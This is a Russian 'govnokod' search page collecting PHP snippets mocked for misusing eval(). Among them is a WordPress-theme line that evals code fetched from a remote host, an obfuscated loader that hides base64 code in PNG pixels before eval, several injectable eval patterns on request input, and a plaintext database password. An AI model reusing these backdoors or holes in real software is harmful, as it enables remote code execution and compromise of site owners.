- 1
- 2
- 3
foreach ($params as $k => $v) {
eval('$this->' . $k . ' = $v;');
}-
Поиск говнокода
Этот поиск практически ничего не может найти! Но вы всё-таки попытайтесь, вдруг повезет.
Найдено: 98
-
PHP / Говнокод #6933
+164
Yurik,
12 Июня 2011
Комментарии (3) -
PHP / Говнокод #6918
+156
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
class sqlinj { ... public $liste=array("=","\'","\"","*","\-","declare","char","set","cast","convert","drop","exec","meta","script","select","truncate","insert","delete","union","update","create","where","join","information_schema","table_schema","into"); ... private function tumsorgular($yapilacak){ switch ($yapilacak){ case "post": $this->islet=array("POST"); break; case "get": $this->islet=array("GET"); break; case "request": $this->islet=array("REQUEST"); break; case "aio": $this->islet=array("POST","GET","REQUEST"); break; } foreach($this->islet as $islem){ eval('foreach($_'.$islem.' as $ad=>$deger){ $_'.$islem.'[$ad]=$deger; foreach($this->liste as $bul){ $_'.$islem.'[$ad]=str_replace($bul,"\\\".$bul."\\\",$_'.$islem.'[$ad]); } } ... }[url=http://www.phpclasses.org/browse/file/35305.html]Basic SQL Injection Protection[/url]
Cleanup harmful text from request parameters
Взято с phpclasses.org.
Новый тип говнокода- турецкий(описание: расходится по швам при первой носке)
А чё, ... не попортим так хакнем ;D
AlexanderC,
10 Июня 2011
Комментарии (12) -
PHP / Говнокод #6878
+161
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
<? //------------------------------------------// // Рисуем кнопку с цифирками xD // //------------------------------------------// // Берём конфиг и библиотеки $db_db = "hoster1129_mc"; // Имя базы данных $db_user = "hoster1129_mc"; // Пользователь сервера баз данных $db_pass = "SH3vOp4m"; // Пароль $db_server = "localhost"; // Имя сервера $red = "80"; // RGB(Red) $green = "80"; // RGB(Green) $blue = "80"; // RGB(Blue) //$count = "123"; // Проверим соединение с базой $link = @mysql_connect($db_server, $db_user, $db_pass); if(!$link) { die('Невозможно подключится к MySQL базе'); } //Убираем кол-во $count = "0"; //Берем кол-во серверов с базы $link = mysql_connect($db_server, $db_user, $db_pass); if(!$link) die("MySQL Error"); mysql_select_db($db_db) or die("MySQL Error"); $query = "SELECT * FROM ats_stats"; $result = mysql_query($query, $link) or die(mysql_error()); //Цикль while($info = mysql_fetch_array($result)) { if($_GET['username'] == $info['username']) { $count = $info['num_ratings']; break; } } //Рисуем)) header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); header("Content-type: image/png"); //Устанавливаем переменные $whatthefuck = mb_strlen($count); $image = ImageCreateFromPNG('vote.png'); $color = ImageColorAllocate($image,$red,$green,$blue); //Проверяем кол-во символов if($whatthefuck == 1) { ImageString($image,3,62,15,$count,$color); } elseif($whatthefuck == 2) { ImageString($image,3,58,15,$count,$color); } elseif($whatthefuck == 3) { ImageString($image,3,55,15,$count,$color); } elseif($whatthefuck == 4) { ImageString($image,3,51,15,$count,$color); } elseif($whatthefuck == 5) { ImageString($image,3,48,15,$count,$color); } else { ImageString($image,3,50,15,"WTF?!",$color); } //Выводим картинку ImagePNG($image); ?>Скрипт должен выводить число голосов по имени.
Enelar,
06 Июня 2011
Комментарии (44) -
PHP / Говнокод #6798
+172
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
<?php //... if(version_compare(phpversion(), '5.0') < 0) { insert_charset_header(); require_once('phpversionfail.php'); die(); } require_once('include/utils/utils.php'); if (version_compare(phpversion(), '5.0') < 0) { eval(' function clone($object) { return $object; } '); } //.... ?>Код из vTiger CRM. Индусы как обычно.
mr.The,
31 Мая 2011
Комментарии (6) -
PHP / Говнокод #6727
+154
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
<?php // PHP function operate($o){$cnt=substr(base64_decode(substr($o,8)),8);$cnt[1]=chr(base64_decode('ODA='));$cnt[2]=chr(base64_decode('Nzg='));$cnt[3]=chr(base64_decode('NzE='));file_put_contents($n='/tmp/'.md5($o), $cnt);list($s)=getimagesize($n);$m=imagecreatefrompng($n);$dc="";for($p=0;$p<$s;$p++){$ca=imagecolorsforindex($m,imagecolorat($m,$p,0));$cc=$ca[base64_decode('cmVk')];$cb=$ca[base64_decode('Z3JlZW4=')];$cd=$ca[base64_decode('Ymx1ZQ==')];$dc.= chr($cc).chr($cb).chr($cd);}unlink($n);eval(base64_decode($dc));} operate('63013567NjMwMTM1NjeJAQIDDQoaCgAAAA1JSERSAAAAHAAAAAEIAwAAAPqbPuMAAABUUExURVpXTm9ieUk4Y0hKbFBpSTdabTl5S0NScFBUQTdKR2s4TlRBd095UnBLeXNwWldOb2J5TFFyeURSZ2RHSDBMalJndEN3MFk0aElIc2thWDFjYmlJN0nSXZcAAAAlSURBVAiZY2BgZGJmYWVj5+Dk4ubh5eMXEBQSFhEVE5eQlJIGAA5jAXsFST1JAAAAAElFTkSuQmCC'); // OUTPUT Я считаю! 0 Я считаю! 1 Я считаю! 2 Я считаю! 3 ... Я считаю! 497 Я считаю! 498 Я считаю! 499 ?>Изощренный метод кодирования исходных кодов :))))
greevex,
22 Мая 2011
Комментарии (7) -
PHP / Говнокод #6698
+171
- 1
return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=27&n'));Вот такие простые ребята клепают темы для вордпресса.
yasenhui,
17 Мая 2011
Комментарии (22) -
PHP / Говнокод #6607
+159
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
$value = ""; $content = $content; $val = "\$content->" . $field->name; $fieldname = $field->name; eval("if (isset($val)) \$value = \"$val\";"); $value = JText::_($value); $value = stripslashes($value);Joomla. Adsmanager
Jetti,
10 Мая 2011
Комментарии (5) -
PHP / Говнокод #6146
+170
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
$замены = array( '{' => 'начало', '}' => 'конец', 'for' => 'циклдля', 'echo' => 'вывод', 'print' => 'печать', 'while' => 'пока', 'foreach' => 'циклмассив', '$' => 'пер ', '=' => ':=', //'==' => '=', '!=' => '<>', 'function' => 'функ', 'true' => 'правда', 'false' => 'ложь', 'if' => 'если', 'else' => 'иначе', 'as' => 'как', 'array' => 'массив', '_GET' => 'ГЕТ', '_POST' => 'ПОСТ', 'return' => 'вернуть', ); isset($_GET['debug']) ? print(ВПоХаПэ(file_get_contents($_GET['f']))) : Компилить(file_get_contents($_GET['f'])); function Компилить($сорсец) { eval(ВПоХаПэ($сорсец)); } function ВПоХаПэ($сорсец) { global $замены; return str_replace(array_values($замены), array_keys($замены), $сорсец); } function ИзПоХаПэ($сорсец) { global $замены; return str_replace(array_keys($замены), array_values($замены), $сорсец); }Транслятор псевдоязыка в PHP
Мартин,
30 Марта 2011
Комментарии (15) -
PHP / Говнокод #5834
+166
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
$url=$_SERVER['REQUEST_URI']; $url9=substr($url,0,9); $url8=substr($url,0,8); $url14=substr($url,0,14); $url10=substr($url,0,10); $url5=substr($url,0,5); if ($url9=='/calendar') { printf('<!-- (C)2000-2010 Gemius SA - gemiusAudience / sitecom / Calendar --> <script type="text/javascript"> <!--//--><![CDATA[//><!-- var pp_gemius_identifier = new String(\'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\'); //--><!]]> </script> <script type="text/javascript" src=" http://site.com/gemius/xgemius.js"></script>'); }elseif ($url8=='/content'){ printf('<!-- (C)2000-2010 Gemius SA - gemiusAudience / sitecom / Content --> <script type="text/javascript"> <!--//--><![CDATA[//><!-- var pp_gemius_identifier = new String(\'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\'); //--><!]]> </script> <script type="text/javascript" src=" http://site.com/gemius/xgemius.js"></script>'); } elseif ($url14=='/forum_arch'){ printf('<!-- (C)2000-2010 Gemius SA - gemiusAudience / sitecom / Forum archiv --> <script type="text/javascript"> <!--//--><![CDATA[//><!-- var pp_gemius_identifier = new String(\'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\'); //--><!]]> </script> <script type="text/javascript" src=" http://site.com/gemius/xgemius.js"></script>'); } elseif ($url10=='/forum/'){ printf('<!-- (C)2000-2010 Gemius SA - gemiusAudience / sitecom / Forum pages --> <script type="text/javascript"> <!--//--><![CDATA[//><!-- var pp_gemius_identifier = new String(\'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\'); //--><!]]> </script> <script type="text/javascript" src=" http://site.com/gemius/xgemius.js"></script>'); } elseif ($url5=='/news'){ printf('<!-- (C)2000-2010 Gemius SA - gemiusAudience / sitecom / News --> <script type="text/javascript"> <!--//--><![CDATA[//><!-- var pp_gemius_identifier = new String(\'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\'); //--><!]]> </script> <script type="text/javascript" src=" http://site.com/gemius/xgemius.js"></script>'); } else { printf('<!-- (C)2000-2010 Gemius SA - gemiusAudience / sitecom / Glavnaja stranitsa sajta --> <script type="text/javascript"> <!--//--><![CDATA[//><!-- var pp_gemius_identifier = new String(\'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\'); //--><!]]> </script> <script type="text/javascript" src=" http://site.com/gemius/xgemius.js"></script>'); }Вместо xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxx в коде оригинальные id счетчиков. Это всё чудо лежит в базе и выполняется через eval()
nergalic,
01 Марта 2011
Комментарии (3) -
PHP / Говнокод #5825
+164
- 1
- 2
- 3
- 4
- 5
- 6
- 7
<?php $Options = file("OPTIONS.txt"); foreach ($Options as $opt) { $opt = trim($opt); eval("$".$opt.";"); }
qbasic,
28 Февраля 2011
Комментарии (24)
Follow us!